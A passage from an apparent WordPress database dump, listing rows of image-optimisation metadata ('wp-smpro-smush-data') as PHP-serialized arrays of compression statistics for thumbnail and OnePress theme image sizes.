0347576011527195305461646057665348052978515625;s:5:\"bytes\";i:14016;s:11:\"size_before\";i:165863;s:10:\"size_after\";i:151847;s:4:\"time\";d:0.1100000000000000144328993201270350255072116851806640625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.980000000000000426325641456060111522674560546875;s:5:\"bytes\";i:493;s:11:\"size_before\";i:7058;s:10:\"size_after\";i:6565;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.050000000000000710542735760100185871124267578125;s:5:\"bytes\";i:954;s:11:\"size_before\";i:11844;s:10:\"size_after\";i:10890;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:5420;s:11:\"size_before\";i:62328;s:10:\"size_after\";i:56908;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.089999999999999857891452847979962825775146484375;s:5:\"bytes\";i:828;s:11:\"size_before\";i:11671;s:10:\"size_after\";i:10843;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.410000000000000142108547152020037174224853515625;s:5:\"bytes\";i:2296;s:11:\"size_before\";i:27298;s:10:\"size_after\";i:25002;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.8100000000000004973799150320701301097869873046875;s:5:\"bytes\";i:4025;s:11:\"size_before\";i:45664;s:10:\"size_after\";i:41639;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}}}'),(4282,2265,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:12.6434801865088655148383622872643172740936279296875;s:5:\"bytes\";i:10277;s:11:\"size_before\";i:81283;s:10:\"size_after\";i:71006;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.78000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:340;s:11:\"size_before\";i:4369;s:10:\"size_after\";i:4029;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.2400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:748;s:11:\"size_before\";i:6657;s:10:\"size_after\";i:5909;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.1500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:4098;s:11:\"size_before\";i:28959;s:10:\"size_after\";i:24861;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.0999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:628;s:11:\"size_before\";i:6216;s:10:\"size_after\";i:5588;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.2799999999999993605115378159098327159881591796875;s:5:\"bytes\";i:1500;s:11:\"size_before\";i:13295;s:10:\"size_after\";i:11795;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.5999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:2963;s:11:\"size_before\";i:21787;s:10:\"size_after\";i:18824;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4283,2264,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.3286424397125013996401321492157876491546630859375;s:5:\"bytes\";i:12301;s:11:\"size_before\";i:119096;s:10:\"size_after\";i:106795;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.6199999999999992184029906638897955417633056640625;s:5:\"bytes\";i:496;s:11:\"size_before\";i:5756;s:10:\"size_after\";i:5260;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.7599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:922;s:11:\"size_before\";i:9445;s:10:\"size_after\";i:8523;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:4805;s:11:\"size_before\";i:43058;s:10:\"size_after\";i:38253;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.6300000000000007815970093361102044582366943359375;s:5:\"bytes\";i:797;s:11:\"size_before\";i:9230;s:10:\"size_after\";i:8433;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.8499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:1924;s:11:\"size_before\";i:19538;s:10:\"size_after\";i:17614;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.4700000000000006394884621840901672840118408203125;s:5:\"bytes\";i:3357;s:11:\"size_before\";i:32069;s:10:\"size_after\";i:28712;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}}}'),(4284,2263,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.1234155149911497773018709267489612102508544921875;s:5:\"bytes\";i:10206;s:11:\"size_before\";i:111866;s:10:\"size_after\";i:101660;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.1500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:392;s:11:\"size_before\";i:5482;s:10:\"size_after\";i:5090;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.1899999999999995026200849679298698902130126953125;s:5:\"bytes\";i:765;s:11:\"size_before\";i:9338;s:10:\"size_after\";i:8573;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:3924;s:11:\"size_before\";i:38984;s:10:\"size_after\";i:35060;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.37000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:669;s:11:\"size_before\";i:9076;s:10:\"size_after\";i:8407;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.9000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:1719;s:11:\"size_before\";i:19312;s:10:\"size_after\";i:17593;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.2200000000000006394884621840901672840118408203125;s:5:\"bytes\";i:2737;s:11:\"size_before\";i:29674;s:10:\"size_after\";i:26937;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4285,2262,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.893659186547591133376045036129653453826904296875;s:5:\"bytes\";i:11732;s:11:\"size_before\";i:118581;s:10:\"size_after\";i:106849;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.62000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:376;s:11:\"size_before\";i:5676;s:10:\"size_after\";i:5300;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.7599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:839;s:11:\"size_before\";i:9577;s:10:\"size_after\";i:8738;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.1500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:4772;s:11:\"size_before\";i:42803;s:10:\"size_after\";i:38031;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.3499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:683;s:11:\"size_before\";i:9296;s:10:\"size_after\";i:8613;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.46000000000000085265128291212022304534912109375;s:5:\"bytes\";i:1895;s:11:\"size_before\";i:20030;s:10:\"size_after\";i:18135;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.1500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:3167;s:11:\"size_before\";i:31199;s:10:\"size_after\";i:28032;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}}}'),(4286,2261,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.0503298987142084541801523300819098949432373046875;s:5:\"bytes\";i:16055;s:11:\"size_before\";i:159746;s:10:\"size_after\";i:143691;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.87000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:305;s:11:\"size_before\";i:5197;s:10:\"size_after\";i:4892;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:7;s:5:\"bytes\";i:553;s:11:\"size_before\";i:7895;s:10:\"size_after\";i:7342;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.519999999999999573674358543939888477325439453125;s:5:\"bytes\";i:3709;s:11:\"size_before\";i:35269;s:10:\"size_after\";i:31560;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.96000000000000085265128291212022304534912109375;s:5:\"bytes\";i:6844;s:11:\"size_before\";i:57211;s:10:\"size_after\";i:50367;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.5;s:5:\"bytes\";i:493;s:11:\"size_before\";i:7587;s:10:\"size_after\";i:7094;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.46000000000000085265128291212022304534912109375;s:5:\"bytes\";i:1506;s:11:\"size_before\";i:17801;s:10:\"size_after\";i:16295;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.1899999999999995026200849679298698902130126953125;s:5:\"bytes\";i:2645;s:11:\"size_before\";i:28786;s:10:\"size_after\";i:26141;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4287,2260,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:15.68882766932828332073768251575529575347900390625;s:5:\"bytes\";i:14579;s:11:\"size_before\";i:92926;s:10:\"size_after\";i:78347;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.54000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:277;s:11:\"size_before\";i:3672;s:10:\"size_after\";i:3395;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.9700000000000006394884621840901672840118408203125;s:5:\"bytes\";i:552;s:11:\"size_before\";i:5034;s:10:\"size_after\";i:4482;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:3250;s:11:\"size_before\";i:19934;s:10:\"size_after\";i:16684;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.3599999999999994315658113919198513031005859375;s:5:\"bytes\";i:5935;s:11:\"size_before\";i:32318;s:10:\"size_after\";i:26383;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.980000000000000426325641456060111522674560546875;s:5:\"bytes\";i:535;s:11:\"size_before\";i:4873;s:10:\"size_after\";i:4338;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.0299999999999993605115378159098327159881591796875;s:5:\"bytes\";i:1496;s:11:\"size_before\";i:10665;s:10:\"size_after\";i:9169;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.4199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:2534;s:11:\"size_before\";i:16430;s:10:\"size_after\";i:13896;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4288,2254,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:2.874298552272338103108495488413609564304351806640625;s:5:\"bytes\";i:8559;s:11:\"size_before\";i:297777;s:10:\"size_after\";i:289218;s:4:\"time\";d:0.6300000000000001154631945610162802040576934814453125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.39000000000000001332267629550187848508358001708984375;s:5:\"bytes\";i:38;s:11:\"size_before\";i:9763;s:10:\"size_after\";i:9725;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.21999999999999975131004248396493494510650634765625;s:5:\"bytes\";i:935;s:11:\"size_before\";i:22148;s:10:\"size_after\";i:21213;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.75;s:5:\"bytes\";i:1986;s:11:\"size_before\";i:113537;s:10:\"size_after\";i:111551;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.04000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:993;s:11:\"size_before\";i:19683;s:10:\"size_after\";i:18690;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.930000000000000159872115546022541821002960205078125;s:5:\"bytes\";i:1953;s:11:\"size_before\";i:49669;s:10:\"size_after\";i:47716;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.20000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:2654;s:11:\"size_before\";i:82977;s:10:\"size_after\";i:80323;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}}}'),(4289,2253,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:2.44131400537147502660673126229085028171539306640625;s:5:\"bytes\";i:12535;s:11:\"size_before\";i:513453;s:10:\"size_after\";i:500918;s:4:\"time\";d:0.979999999999999982236431605997495353221893310546875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:13645;s:10:\"size_after\";i:13645;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:22220;s:10:\"size_after\";i:22220;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.70000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:3191;s:11:\"size_before\";i:118275;s:10:\"size_after\";i:115084;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.9900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:8060;s:11:\"size_before\";i:202209;s:10:\"size_after\";i:194149;s:4:\"time\";d:0.36999999999999999555910790149937383830547332763671875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:22087;s:10:\"size_after\";i:22087;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:50464;s:10:\"size_after\";i:50464;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.520000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:1284;s:11:\"size_before\";i:84553;s:10:\"size_after\";i:83269;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}}}'),(4290,2252,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:15.9321979708415053522685411735437810420989990234375;s:5:\"bytes\";i:89697;s:11:\"size_before\";i:562992;s:10:\"size_after\";i:473295;s:4:\"time\";d:1.0100000000000000088817841970012523233890533447265625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.8499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:2226;s:11:\"size_before\";i:14994;s:10:\"size_after\";i:12768;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.9000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:3345;s:11:\"size_before\";i:24073;s:10:\"size_after\";i:20728;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.03999999999999914734871708787977695465087890625;s:5:\"bytes\";i:20702;s:11:\"size_before\";i:129064;s:10:\"size_after\";i:108362;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.480000000000000426325641456060111522674560546875;s:5:\"bytes\";i:37148;s:11:\"size_before\";i:225475;s:10:\"size_after\";i:188327;s:4:\"time\";d:0.40000000000000002220446049250313080847263336181640625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.410000000000000142108547152020037174224853515625;s:5:\"bytes\";i:3437;s:11:\"size_before\";i:23848;s:10:\"size_after\";i:20411;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.53999999999999914734871708787977695465087890625;s:5:\"bytes\";i:8399;s:11:\"size_before\";i:54059;s:10:\"size_after\";i:45660;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.78999999999999914734871708787977695465087890625;s:5:\"bytes\";i:14440;s:11:\"size_before\";i:91479;s:10:\"size_after\";i:77039;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}}}'),(4291,2235,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.819031841857945863694112631492316722869873046875;s:5:\"bytes\";i:11073;s:11:\"size_before\";i:125558;s:10:\"size_after\";i:114485;s:4:\"time\";d:0.63000000000000000444089209850062616169452667236328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.21999999999999975131004248396493494510650634765625;s:5:\"bytes\";i:1101;s:11:\"size_before\";i:15248;s:10:\"size_after\";i:14147;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.870000000000000994759830064140260219573974609375;s:5:\"bytes\";i:8691;s:11:\"size_before\";i:37995;s:10:\"size_after\";i:29304;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.53000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:1281;s:11:\"size_before\";i:23181;s:10:\"size_after\";i:21900;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:21195;s:10:\"size_after\";i:21195;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:27939;s:10:\"size_after\";i:27939;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}}}'),(4292,2234,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:26.473153895750893838112460798583924770355224609375;s:5:\"bytes\";i:20940;s:11:\"size_before\";i:79099;s:10:\"size_after\";i:58159;s:4:\"time\";d:0.309999999999999997779553950749686919152736663818359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:3:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:27.719999999999998863131622783839702606201171875;s:5:\"bytes\";i:4321;s:11:\"size_before\";i:15587;s:10:\"size_after\";i:11266;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:25.410000000000000142108547152020037174224853515625;s:5:\"bytes\";i:8374;s:11:\"size_before\";i:32956;s:10:\"size_after\";i:24582;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:26.980000000000000426325641456060111522674560546875;s:5:\"bytes\";i:8245;s:11:\"size_before\";i:30556;s:10:\"size_after\";i:22311;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}}}'),(4293,2233,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:13.5860077515124242353294903296045958995819091796875;s:5:\"bytes\";i:12374;s:11:\"size_before\";i:91079;s:10:\"size_after\";i:78705;s:4:\"time\";d:0.45000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:1284;s:11:\"size_before\";i:13315;s:10:\"size_after\";i:12031;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.410000000000000142108547152020037174224853515625;s:5:\"bytes\";i:3721;s:11:\"size_before\";i:29987;s:10:\"size_after\";i:26266;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.7400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:2657;s:11:\"size_before\";i:22631;s:10:\"size_after\";i:19974;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.739999999999998436805981327779591083526611328125;s:5:\"bytes\";i:4712;s:11:\"size_before\";i:25146;s:10:\"size_after\";i:20434;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}}}'),(4294,2232,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.449886949108565914468016444516251794993877410888671875;s:5:\"bytes\";i:971;s:11:\"size_before\";i:215832;s:10:\"size_after\";i:214861;s:4:\"time\";d:0.33999999999999996891375531049561686813831329345703125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:971;s:11:\"size_before\";i:17384;s:10:\"size_after\";i:16413;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:51319;s:10:\"size_after\";i:51319;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:42361;s:10:\"size_after\";i:42361;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:104768;s:10:\"size_after\";i:104768;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}}}'),(4295,2200,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:24.6989609964848426670869230292737483978271484375;s:5:\"bytes\";i:305087;s:11:\"size_before\";i:1235222;s:10:\"size_after\";i:930135;s:4:\"time\";d:3.869999999999999662492200513952411711215972900390625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.559999999999998721023075631819665431976318359375;s:5:\"bytes\";i:5286;s:11:\"size_before\";i:23433;s:10:\"size_after\";i:18147;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.739999999999998436805981327779591083526611328125;s:5:\"bytes\";i:10194;s:11:\"size_before\";i:49151;s:10:\"size_after\";i:38957;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:96195;s:11:\"size_before\";i:436873;s:10:\"size_after\";i:340678;s:4:\"time\";d:1.350000000000000088817841970012523233890533447265625;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:25.870000000000000994759830064140260219573974609375;s:5:\"bytes\";i:106533;s:11:\"size_before\";i:411775;s:10:\"size_after\";i:305242;s:4:\"time\";d:1.3000000000000000444089209850062616169452667236328125;}